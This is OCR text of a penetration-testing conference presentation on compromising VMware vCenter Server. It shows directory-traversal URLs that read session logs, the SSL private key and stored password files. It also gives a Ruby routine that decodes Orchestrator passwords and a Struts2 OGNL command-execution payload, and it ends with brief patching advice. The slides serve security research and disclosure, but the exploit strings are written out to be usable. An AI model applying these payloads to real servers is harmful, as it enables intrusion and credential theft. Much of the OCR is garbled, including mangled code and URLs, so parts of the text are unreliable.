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Invest in security 

to secure investments 




How to hack VMware 
vCenter server in 60 
seconds 



Alexander Minozhenko 
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Pen-tester at Digital Security 



Researcher 



DEFCON RUSSIA 



DCG#7812 / Zeronights 



DCG * 7312 



CTF 

Thanks for ideas and support to Alexey Sintsov 
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What do pen-testers do? 



Scanning 
Fingerprinting 
Banner grabbing 
Play with passwords 



Find vulns. 
Exploit vulns. 



Escalate privs. 
Dig in 

Find ways to make attacks 
And e.t.c. 
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Static 

— Source code review 

• regexp 

• formal methods 

• hand testing 

— Reverse Engineering 

• formal methods 

• hands... 

Dynamic 

— Fuzzing (bin/web) 

+ Typical bugs for class 
+ Reverse Engineering 

— Hand testing 

Architecture Analysis (Logic flaws) 
Use vuln. Database (CVE/exploit- 
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Tasks: 




pwn target 8) 
show most dang, vulns. 
show real attacks and what an attacker can do 



Time: 

Not much ) 
Ta rgets : 

Large number of targets, different types 




- Fuzzing (bin/web) 



[ + T ypical bugs for class I 

+ Reverse Engineering 
- Hana testing 1 

Architecture Analysis (Logic flaws) 

Use vuln. Database (CVE/exploit-db/etc 




Workstation Workstation Workstation 
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VMware vCenter Server 



VMware vCenter Server is solution to manag 
VMware vSphere 

vSphere - virtualization operating system 





Manage 




VM 


VM 


VM 


VM 




VM 


VM 


VM 


VM 




VM 


VM 


VM 


VM 












VMware vSphere 


VMware vSphere 


VMware vSphere 





_J 
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Vmware vCenter versi 
Services: 

— Update Manager 

— vCenter Orchestrator 

— Chargeback 

— Other 

Each services has web 



>n 4.1 update 1 



VMware 

vCenter Server 



Automation 

Unlocks the power of 
VMware vSphere 
through proactive 
management 







Scalability 

Scalable and enten-ilble 
nruiugesnem platform 



""^HJ-* 



Visibility 

Deep visibility Into 
every level of the 
virtual infrastructure 




server 
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CVE-2009-1523 



Directory traversal in Jetty web server 

http://target:9084/vci/download/health.xml/%3f/../../../../FILE 

Discovered by Claudio Criscione 

But Fixed in VMware Update Manager 4.1 update 1 :( 
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• Directory traversal in Jetty web server 

• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..% 
5C..%5C..%5C..\FILE.EXT 

• Discovered by Alexey Sintsov 

• Metasploit module vmware_update_manager_traversal.rb by 



sinn3r 



^ ERPScan 



Security Scanner for SAP 



Directory traversa 



What file to read? 

Claudio Criscione propose to read vpxd-profiler-* - 

/SessionStats/SessionPool/Session/ld='06B90BCB-A0A4-4B9C-B680- 
FB72656AlDCB7Username=,,FakeDomain\FakeUser7SoapSession/ld 
D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1 



='A 



• Contains logs of SOAP requests with session ID 
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• "VASTO - collection of Metasploit modules 
meant to be used as a testing tool to perform 
penetration tests or security audit of 
virtualization solutions." 
http://vasto.nibblesec.org/ 

• vmware_updatemanager_traversal.rb 
Jetty path traversal 

• vmware_session_rider.rb 

Local proxy to ride stolen SOAPID sessions 
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Fixed in version 4.1 update 1, 
contain ip - addresses 




&bwj] npaBKa Bma XypHaji 3aK/ia^KH MHcrpyMeHTbi Cnpaeita 

9 : o X & ( 



http:/. 




084/vc i/d own load s/.\. .\. .\. .\. .\. .\. .\. .\P ro g ra rn D ata\VM wa re\VM wa re Vi rtu a I C enter\Lo g s\.vpxd - p rof i I er-6 



P CaMbie nony^napHbie HanajibHaji CTpaHHu,a /leHTa HOBOCTew 



» 

■ http:/; 




m 


mm- 



^..d - prof i I er-6.log X 



Error 404 - Not Found 



x 



Section for VMware VirtualCenter, pid=3564, version=4 . 1 . f build=build-345043 f option=Releese 
[2011-^-0 12:33:20.558 00560 info 'App'] 
<p ul 1 Count e r s > 

/Alarir.Stats/Notif i cations Fending/ Count/total 

/DbStats/Fool/Cnx/InUse/total 1 

/DbStats/Pool/Cnx/RetryCount /total 

/DbStats/Paal/Cnx/Size/tatal 10 

/ DbS tat s /Pool/Tm/CoiriQit Count/ total 5 6 

/DbStats/Pool/Txn/ReplsyCount/total 

/DbStats/Paal/Txn/RallbackCaunt/ total 

/ Db Stats/Fool /Txn/ S tint Count /tot al 555 

/EventStats/PendingE vents /Count/ total 2 

/Inventor yStats/ManagedEntityStats/Clusters/total 2 
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Make arp poisoning attack 
Spoof ssl certificate 
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Administrators check SSL cert 



Se cy rity Wa rn in g 



|— Certificate Warnings 

An untrusted SSL certificate is installed on r, A'in-9iipbe5q5br r and secure communication cannot be 
guaranteed. Depending on your security policy r this issue might not represent a security concern 
You may need to install a trusted SSL certificate on your server to prevent this warning from 
appearing. 



Click Ignore to continue using the current SSL certificate 



View Certificate 



Ignore 



Cancel 



I - Install this certificate and do notdisplay any security warnings for'\win-9iipbe5q5br". 
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• Steal ssl key via directory traversal 

http://target:9084/vci/downloads/.\.A-.\.A-.\.A-.\.ADocuments and SettingsXAII 
Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key 

• Make arp-spoofing 

• Decrypt traffic with stolen ssl key 

• What if arp-spoofing does not work? 
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Vmware vCenter Orchestrator 



Vmwa re vCO - software for automate 
configuration and management 

nstall by default with vCenter 

• Have interesting file 

C:\Program files\VMware\lnfrastructure\Orchestrator 
\configuration\ietty\etc\passwd. properties 
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Vmware vCenter Orchestrator 



Which contains md5 password without salt 
Could easy bruteforce using rainbow tables 





Ky dookie@inbotfu: Re yo... [j http;//defcon-njs5E3.ru/d,.. 



1010,4.30i9084/vci/down... ■ \ Q 




f CO 




:9034/vci/downloads/,%5C..%5C..%5C%5C.%5C.%5C.%5C..%5CPfogr3nn% 
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VMware vCenter Orchestrator Configuration 



General 


-T- Network 




^fc LDAP 




Database 


4 


Server Certificate 


A 


Licenses 


A 


1 4 

Startup Options 




[ ^ Troubleshooting 


Plug-ins 




^/^Mail (l.l.O) 




ifi^, SSH (1.0.2) 


r* 


J^J vCenter 4.0 (4.0.0) 


L A 






VMware Virtual Infrastructure 



Available: 



Host: 



Port: 



Path: 



User name : 



Password : 



User name : 



Password : 



Enabled 



n ew- virtu a l-center-h a st 



142 



ju Secure channel 



/sdk 



Specify the user credential for the admir 



vmware 




Specify which strategy will be used for it 
Share a unique session : Se 



v ; - - iciiucinig Lciiijjia lc , / m_u - 1111 f uagc^; piug.ii n piugn i . j 3|j ~~> 

i<div id="c_ct>ntent"> 

▼ •{form narie5pace='7ccinfig^plugin ir id=' r PluginSaue ir name= ir Plugin5ave ir o n submit = "return 

tfalidateFom_Plugin5ave() ; Ir action='7config^plLgin/PluginSave .action 11 method="P05T ir > 
Kp>„.{/p> 

^ <diif id= ir wwgrp_Plugin5ave_ir5tallJ5ername' r class ="wwgrp "">„.■; /div> 

T <div id= l! vfffErp_PluginSave_installPa5sword" class ="ww , erp ,B > 
► <div id= IB wwlbl_PluginSa^e_iri5tallPa55tford ir cla55= ,r mdbr>...Vdiv> 

<br> 

W<div id= ir wwctrl_Plugin5a\/e_in5tallPa55word ir cla55= ira wwftifc^ 

i input type= ir password ,r name= "installPassword " val^ ,F Password&l/^d= ,, PluginSave_installPassword ,l > 
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Vmware vCenter Orchestrator 



• vCO stored password at files: 

• C:\Program 
Files\VMware\lnfrastructure\Orchestrator\app- 
server\server\vmo\conf\plugins\VC.xml 

• C:\Program 
Files\VMware\lnfrastructure\Orchestrator\app- 
server\server\vmo\conf\vmo. properties 
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<?xml version= ,, 1.0" encoding= ,, UTF-8" standalone="yes ,, ?> 
<virtual-infrastructure-hosts> 
<virtual-infrastructure-host 
<enabled>true</enabled> 

<url>https://new-virtual-center-host:443/sdk</url> 

<administrator-username>vmware</administrator- 
username> 

odministrator- 
password>010506275767b74786b383a4a60be76786474032 
9d5fcf324ec7fc98ble0aaeef </administrator-password> 

<pattern>%u</pattern> 

</virtual-infrastructure-host> 

</virtual-infrastructure-hosts> 
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Password Encoding 



006766e7964766al51e213a242665123568256c4031702d4c78454e5b575f60654b 
vmware 



00776646771786a783922145215445b62322dla2b5d6el96a6a712d712e24726079 
vcenter 



Red bytes look like length 
Green bytes in ASCII range 
Black bytes random 
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Algorithm password Encoding 




1 for (int i 0; i nbDigits; i ) { 



2 | int value = 0; 

3 | | if (i < pwd.lengthQ) { 

4 I value pwd.charAt(i); 

5 // Take i th password symbol 

6 | 1 } 

7 I else 

8 ! I { 

9 ! value = Math.abs(rnd.nextlnt() % 100); 

10 I // Take random byte 

11 | | } 

12 | String to Add = Integer. toHexString(value i); 

13 I // i th password symbol position of symbol 

14 result . append (toAdd); 

15 



1 len 


= (pass[0. .2]) ,to_i 


2 enc_ 


_pass = pass[3. . -1] ,scan(/.{2}/) 


3 dec_ 


_pass = (0. . .len) .collect do |i| 


4 | 


byte = enc_pass[i] ,to_i(16) 


5 | 


byte -= i 


7 end 


byte.chr 
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VMware vCenter Orchestrator use Struts2 
version 2.11 discovered by Digital Defense, Inc 

CVE-2010-1870 Struts2/XWork remote 
command execution discovered by Meder 
Kydyraliev 

Fixed in 4.2 
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#memberAccess[ 'allowStaticMethodAccess ' ] = true 

#foo = new java . tang , Boolean ( "false" ) 

#context[ 'xwork.MethodAccessor.denyMethodExecution r ] = #foo 

#rt = ^jQva , long Rmtim%QtMtim() 

#rt.exec('calc exe J ) 
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Attack Vectors 



Directory traversal + ARP poisoning 

Directory traversal + password 
decoding/bruteforcing 

Remote code execution using Struts2 bug 
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Update to latest version 4.2 update 4 or 5 
Filter administration service services 

VMware KB 2021259. 



VMware vSphere Security Hardering Guide 
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Conclusions 



Password must be stored in hash with salt 
encrypted 

Fixed bugs not always fixed in proper way 

Pen-tester will get more profit if he tries to 
research something 

One simple bug and we can own all 
infrastructure 
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